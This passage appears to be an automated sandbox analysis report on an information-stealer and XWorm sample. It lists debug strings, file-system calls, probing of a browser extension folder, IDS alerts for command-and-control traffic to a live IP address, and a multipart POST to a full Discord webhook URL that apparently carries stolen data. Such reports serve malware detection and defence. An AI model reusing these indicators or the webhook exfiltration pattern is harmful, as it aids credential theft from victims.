                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                        Source: Binary string: .pdb/ source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000008.00000002.1950555246.00007FFBA6512000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/? source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbl source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000008.00000002.1955863036.00007FFBBC341000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000008.00000002.1954782727.00007FFBAB971000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, program.exe, 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbN0uP source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000008.00000002.1955626688.00007FFBBC151000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000008.00000002.1955177805.00007FFBBAF31000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb63 source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdbhP source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, program.exe, 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, 00000008.00000002.1954529831.00007FFBAB941000.00000040.00000001.01000000.00000010.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C659280 FindFirstFileExW,FindClose,5_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C659280 FindFirstFileExW,FindClose,8_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49725 -> 147.185.221.23:33942
                        Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49728 -> 147.185.221.23:33942
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: 147.185.221.23
                        Source: global trafficTCP traffic: 192.168.2.8:49709 -> 147.185.221.23:33942
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA49660C recv,8_2_00007FFBAA49660C
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 502440User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=6672d82bd038a7446290ef714c16a718
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 10:22:01 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731838922x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAafSwTRG6Fa%2FRJMOc3VGX0BCuXUtuULCwhFeDvjsJPZAKtziv3qP5ItX77L8Jqhu6pfvcjLVPS5rCQSNjrBh6haKFe%2BMITwUEfsxI6na0mnEuRFO4eXHDTPXwff"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=daade001e76c5346a9107562c463e493fd63bfc9-1731838921; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ycNd0d26ksQwnFyG4f9aiNkPKG6_UonCz4_PyaZrPZI-1731838921537-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e3eff479fd14623-DFW
                        Source: program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: powershell.exe, 00000014.00000002.1850687248.000002399BA9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
